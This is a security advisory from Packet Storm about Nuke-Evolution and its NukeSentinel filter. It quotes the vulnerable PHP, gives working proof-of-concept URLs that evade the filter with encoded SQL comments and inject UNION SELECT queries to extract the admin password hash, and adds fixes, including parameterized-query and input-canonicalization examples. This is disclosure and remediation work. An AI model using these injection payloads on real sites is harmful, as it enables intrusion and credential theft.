nuke-bypass.txt

2007-04-19T00:00:00
ID PACKETSTORM:56058
Type packetstorm
Reporter Aleksandar aka sale83
Modified 2007-04-19T00:00:00

Description

                                        
PROGRAM: Nuke-Evolution & NukeSentinel
HOMEPAGE: http://www.nuke-evolution.com/  
VERSION: All versions  
BUG 1 NukeSentinel Bypass SQL Injection Protection  
BUG 2 Nuke Evolution <= 2.0.3 SQL Injections vulnerabilities  
AUTHOR: Aleksandar  
  
NukeSentinel Bypass SQL Injection Protection  
  
nukesentinel.php Line 270-290  
  
******************************************  
// Check for UNION attack  
// Copyright 2004(c) Raven PHP Scripts  
$blocker_row = $blocker_array[1];  
if($blocker_row['activate'] > 0) {  
if (stristr($nsnst_const['query_string'],'+union+') OR stristr($nsnst_const['query_string'],'%20union%20') OR stristr($nsnst_const['query_string'],'*/union/*') OR stristr($nsnst_const['query_string'],' union ') OR stristr($nsnst_const['query_string_base64'],'+union+') OR stristr($nsnst_const['query_string_base64'],'%20union%20') OR stristr($nsnst_const['query_string_base64'],'*/union/*') OR stristr($nsnst_const['query_string_base64'],' union ')) {  
// block_ip($blocker_row);  
die("BLOCK IP 1 " );  
}  
}  
  
// Check for CLIKE attack  
// Copyright 2004(c) Raven PHP Scripts  
$blocker_row = $blocker_array[2];  
if($blocker_row['activate'] > 0) {  
if (  
stristr($nsnst_const['query_string'],'/*') OR   
stristr($nsnst_const['query_string_base64'],'/*') OR   
stristr($nsnst_const['query_string'],'*/') OR   
stristr($nsnst_const['query_string_base64'],'*/')) {  
// block_ip($blocker_row);  
die("BLOCK IP 2 " );  
}   
}  
  
  
******************************************  
  
Example (Bypass SQL Injection Protection):
  
PHPNuke + NukeSentinel  
http://localhost/php-nuke/?%2f**%2fUNION%2f**%2fSELECT ... etc  
  
Nuke-Evolution + NukeSentinel  
http://localhost/nuke-evolution/?%2f**%2fUNION%2f**%2fSELECT .. etc  
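Why the filter misses this: both blockers are plain substring matches, and the bypass URL encodes each `/` as `%2f`, so the string that is matched never contains the literal `/*` or `*/`, nor any of the UNION signatures (none of them allow `/**/` as the separator on the encoded form). Once the query string is percent-decoded, `/**/UNION/**/SELECT` contains both `/*` and `*/union/*`, and the existing signatures fire. The following PHP is an added example, not NukeSentinel's code; it assumes the query string is matched exactly as received (still percent-encoded), which is what the bypass above relies on, and shows the same signatures applied to a canonicalized copy instead:

```php
<?php
// Added example, not NukeSentinel code. The shipped checks are substring
// matches on the query string as received. Assumption: that string is still
// percent-encoded, so "%2f**%2f" never contains the literal "/*" and the
// encoded UNION walks past both blockers. Canonicalize first, then match.

// Percent-decode until the string stops changing (bounded, so double
// encoding is reduced too); urldecode() also turns "+" into a space.
function ns_canonicalize($qs, $maxRounds = 3) {
    $out = (string) $qs;
    for ($i = 0; $i < $maxRounds; $i++) {
        $next = urldecode($out);
        if ($next === $out) {
            break;
        }
        $out = $next;
    }
    return strtolower($out);
}

// The UNION signatures from the original check, applied to a canonical string.
function ns_union_signature_hit($canon) {
    foreach (array('+union+', '%20union%20', '*/union/*', ' union ') as $sig) {
        if (strpos($canon, $sig) !== false) {
            return true;
        }
    }
    return false;
}

// The CLIKE (comment) signatures from the original check.
function ns_comment_signature_hit($canon) {
    return strpos($canon, '/*') !== false || strpos($canon, '*/') !== false;
}

// Constructed sample: the query string of the bypass URL given above.
$raw   = '%2f**%2fUNION%2f**%2fSELECT';
$canon = ns_canonicalize($raw);

printf("raw       %-30s comment=%d union=%d\n", $raw,
       ns_comment_signature_hit(strtolower($raw)), ns_union_signature_hit(strtolower($raw)));
printf("canonical %-30s comment=%d union=%d\n", $canon,
       ns_comment_signature_hit($canon), ns_union_signature_hit($canon));
```

Run as a standalone script: on the raw string neither signature set matches, on the canonical string both do. Decoding before matching closes this particular gap, but a signature list stays a stopgap (it will always lag the next encoding or comment variant, and decoding first raises the false-positive rate on legitimately encoded parameters). The durable fix is the one shown in the module fixes further down: never interpolate request parameters into SQL.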
  
  
  
Nuke-Evolution Basic 2.0.3  
  
Open source content management system which features customizable blocks, modules, multilanguage support and themes, with an emphasis on security, speed and usability.
A PHP-Nuke based CMS with added security, functionality, and core improvements.
  
Site:http://www.nuke-evolution.com/  
  
  
  
Your_Account/index.php  
  
Vulnerability code:  
********************************************************************  
case "userinfo":  
//include("modules/$module_name/public/userinfo.php");  
/*****[BEGIN]******************************************  
[ Mod: YA Merge v1.0.0 ]  
******************************************************/  
//The "$username" variable isn't filtered!!!  
$result = $db->sql_query("SELECT user_id FROM ".$user_prefix."_users WHERE username='$username'");
$uid = $db->sql_fetchrow($result);  
Header("Location: modules.php?name=Profile&mode=viewprofile&u=".$uid[0]);  
die();  
/*****[END]********************************************  
[ Mod: YA Merge v1.0.0 ]  
******************************************************/  
break;  
*********************************************************************  
  
POC Exploit:  
http://localhost/nukeNE/modules.php?name=Your_Account&op=userinfo&username=1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1'%2f**  
  
Results:  
MOZILLA FIREFOX
URL BAR/ADDRESS BAR: http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH  
  
MOZILLA FIREFOX
Live HTTP Headers - Firefox Add-ons  
  
http://localhost/nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH  
GET /nukeNE/modules.php?name=Profile&mode=viewprofile&u=ADMIN-MD5-HASH HTTP/1.1  
Host: localhost:8080  
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.8.1.3) Gecko/20070309 Firefox/2.0.0.3  
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5  
Accept-Language: en-us,en;q=0.5  
Accept-Encoding: gzip,deflate  
  
  
  
  
News/read_article.php line 66  
  
Vulnerability code:  
++++++++++++++++++++++++++++++++++  
// The "$sid" variable isn't filtered!!!
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'";  
$result = $db->sql_query($sql);  
  
++++++++++++++++++++++++++++++++++  
  
POC Exploit:  
http://localhost:8080/htmlNE/modules.php?name=News&file=read_article&sid=-1'%2f**%2fUNION%2f**%2fSELECT%201,1,1,pwd,1,1,1,1,1,1,1,1,1,1%20FROM%20nuke_authors%20WHERE%20radminsuper='1'%2f**  
  
FIX  
++++++++++++++++++++++++++++++++++  
$sid = intval($sid); // FIX
$sql = "select catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM ".$prefix."_stories where sid='$sid'";  
$result = $db->sql_query($sql);  
  
++++++++++++++++++++++++++++++++++  
  
  
  
Donate/index.php line 33 & 46  
Vulnerability code:  
********************************************************  
if (is_numeric($uid)) { // LOL :)
$uid = intval($uid); // :) LOL
}  
  
....  
// Line 46  
  
} elseif (!empty($uid)) {   
include_once(NUKE_BASE_DIR.'header.php');  
$sql = "SELECT username FROM ".$user_prefix."_users where user_id='$uid'"; // BOOM -> SQL injection
$result = $db->sql_query($sql);  
$row = $db->sql_fetchrow($result);  
$name = $row['username'];  
**********************************************************  
  
  
POC Exploit:  
http://localhost:8080/htmlNE/modules.php?name=Donate&op=received&uid=-1'%2f**%2fUNION%2f**%2fSELECT%20pwd%20FROM%20nuke_authors%20WHERE%20%20radminsuper='1  
  
  
  
  
  
FIX  
  
++++++++++++++++++++++++++++++++++++++  
  
///if (is_numeric($uid)) { REMOVE THIS LINE  
$uid = intval($uid);   
///} REMOVE THIS LINE  
++++++++++++++++++++++++++++++++++++++  
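The three lookups above share one defect: a request parameter is spliced into the SQL text. For the two integer ids (`sid`, `uid`) the unconditional `intval()` from the FIX blocks is enough; the `is_numeric()` guard in Donate is worthless because it only casts values that are already numeric and lets everything else through unchanged. The `username` lookup in Your_Account cannot be fixed by casting, since a username is free text, so it has to be bound as a query parameter (or, with the `$db->sql_query()` abstraction the module uses, escaped with `mysql_real_escape_string()` before quoting). The PHP below is an added example, not Nuke-Evolution code; it assumes a PDO connection `$pdo` to the same MySQL database and the same `$user_prefix` / `$prefix` table-prefix variables the original queries use:

```php
<?php
// Added example, not Nuke-Evolution code. The three lookups from the advisory
// rewritten so that request parameters are never spliced into SQL text.
// Assumptions: a PDO connection to the same MySQL database is available as
// $pdo, and the Nuke prefixes $user_prefix and $prefix name the same tables
// the original queries used.

// Your_Account/index.php, op=userinfo. A username is free text and cannot be
// cast to an integer, so bind it as a query parameter instead of quoting it.
function lookup_user_id(PDO $pdo, $user_prefix, $username) {
    $stmt = $pdo->prepare("SELECT user_id FROM {$user_prefix}_users WHERE username = :username");
    $stmt->execute(array(':username' => (string) $username));
    $row = $stmt->fetch(PDO::FETCH_NUM);
    return $row === false ? null : (int) $row[0];
}

// Only redirect when a real user id came back; the original code sent
// whatever the query returned straight into the Location header.
function profile_redirect_target($uid) {
    if ($uid === null || $uid <= 0) {
        return null;
    }
    return 'modules.php?name=Profile&mode=viewprofile&u=' . $uid;
}

// News/read_article.php. sid is an integer id, so the intval() cast from the
// FIX above is what matters; binding it as well keeps the query text constant.
function load_story(PDO $pdo, $prefix, $sid) {
    $sid = intval($sid);
    $stmt = $pdo->prepare("SELECT catid, aid, time, title, hometext, bodytext, topic, informant, notes, acomm, haspoll, pollID, score, ratings FROM {$prefix}_stories WHERE sid = :sid");
    $stmt->execute(array(':sid' => $sid));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row;
}

// Donate/index.php. The shipped guard casts only values that are already
// numeric, so anything else is passed through untouched; cast unconditionally.
function lookup_username(PDO $pdo, $user_prefix, $uid) {
    $uid = intval($uid);
    if ($uid <= 0) {
        return null;   // nothing to look up, no query issued
    }
    $stmt = $pdo->prepare("SELECT username FROM {$user_prefix}_users WHERE user_id = :uid");
    $stmt->execute(array(':uid' => $uid));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return $row === false ? null : $row['username'];
}

// The two Donate guards side by side, on constructed input and without a
// database, to show what each one leaves in $uid.
function donate_guard_shipped($uid) {
    if (is_numeric($uid)) {
        $uid = intval($uid);
    }
    return $uid;
}

function donate_guard_fixed($uid) {
    return intval($uid);
}

// Constructed, truncated copy of the PoC parameter from above.
$constructed = "-1'/**/UNION/**/SELECT ...";
foreach (array('42', $constructed) as $input) {
    printf("%-32s shipped=%s fixed=%s\n", $input,
           var_export(donate_guard_shipped($input), true),
           var_export(donate_guard_fixed($input), true));
}
```

The trailing loop runs without a database and prints what each Donate guard keeps: the shipped guard passes the non-numeric string through verbatim, the fixed one reduces it to `-1`. When `lookup_user_id()` returns `null`, the caller should answer with a not-found page rather than redirect with an empty `u=`. PDO's MySQL driver emulates prepares client-side by default, which is still injection-safe; set `PDO::ATTR_EMULATE_PREPARES` to `false` if server-side binding is wanted.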
  
  
  
  
Best Regards  
Aleksandar  
Programmer and Web Developer  